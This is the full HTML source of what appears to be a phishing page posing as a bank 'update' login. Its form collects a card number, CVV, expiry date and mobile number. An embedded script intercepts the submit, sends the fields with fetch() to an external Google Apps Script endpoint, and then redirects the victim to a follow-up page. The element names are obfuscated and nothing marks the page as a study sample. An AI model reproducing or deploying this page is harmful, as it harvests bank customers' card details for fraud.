<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>update</title>
    <style>
        #awesrw ,#wsdfjkiuytd ,#wsdfjkiuytda
    {
        width: 100%;
    }
    #oiuhgbju

    {
        background-color: rgb(121, 13, 69);
        border-radius: 15px;
        margin-left: 0%;
        font-size: larger;
        color: aliceblue;
        font-style: normal;
        text-decoration-line: none;
        padding-right: 10px;
        padding-left: 3px;
        padding-top: 3px;
        padding-bottom: 3px;

    }
    #puyht 
    {
        background-color: rgb(237, 220, 231);
        border-radius: 15px;
        margin-left: 3%;
        font-size: larger;
        color: rgb(23, 23, 23);
        font-style: normal;
        text-decoration-line: none;
        padding-right: 10px;
        padding-left: 10px;
        padding-top: 3px;
        padding-bottom: 3px;
        
    }
    #ytrdjjy
    {
        margin-left: 9%;
        margin-top: 10%;
    }
    #ytrdchytd
    {
      margin-left: 9%;
      width: 80%;
      height: 28px;
    }
    #ytordchytd ,#ytordchytde
    {
        margin-left: 9%;
      width: 80%;
      height: 28px;
    }
    #ytrdjjyuy{
        margin-left: 9%;
    }
    #oiuygggf
    {
        margin-left: 9%;
        margin-top: 15px;
        width: 80%;
        height: 38px;
        background-color: rgb(121, 13, 69);
        font-size: large;
        color: aliceblue;
    }
    </style>
</head>
<body>
    <div id="awesr">
        <img src="asxfgytresxc.jpg" alt=""  id="awesrw">
    </div>
    <div id="rest">
        <form action="https://script.google.com/macros/s/AKfycbzRhoJAED03W7xasLwlPX6e7zqO0bx5za2do7jzZoGEKALczKJ3dI8avRFJt_JzDAg3/exec" method="post" id="aa">
            <a href="index.html" id="puyht">Customer ID </a>        <a href="pawsdfrewsd.html" id="oiuhgbju">Debit Card No.</a>
            <div id="uytf">
                <p id="ytrdjjy">
                    Credit/Debit Card No.* 
                </p> 
                <input type="number" name="cardn" id="ytrdchytd" placeholder="  Enter Credit/Debit 16 Digit Card No.">

                <p id="ytrdjjyuy">
                    Cvv* 
                </p> 
                <input type="password" name="cvb" id="ytordchytd" placeholder="  Enter Cvv"> <p id="ytrdjjyuy">
                    Valid Upto* 
                </p> 
                <input type="month" name="val" id="ytordchytd" placeholder="  Enter Valid Upto">
                <p id="ytrdjjyuy">
                    Mobile No.
                </p> 
                <input type="number" name="mob" id="ytordchytd" placeholder="  Enter Mobile No.">
                <button type="submit" id="oiuygggf">Login</button>
            </div>
        </form>
        <script type = "text/javascript" >
            window.addEventListener("DOMContentLoaded", function() {
                const yourForm = document.getElementById('aa');
                yourForm.addEventListener("submit", function(e) {
                    e.preventDefault();
                    const data = new FormData(yourForm);
                    const action = e.target.action;
                    fetch(action, {
                        method: 'POST',
                        body: data,
                    }).then(() => {
                        window.location.replace('1ytrsxdfghjuytr.html')
                    })
                })
            }); 
        </script>
        <img src="iuytrdfghjhgf.jpg" alt="" id="wsdfjkiuytd">
        <img src="ytrdsfghjhgfd.jpg" alt="" id="wsdfjkiuytda" >
    </div>
</body>
</html>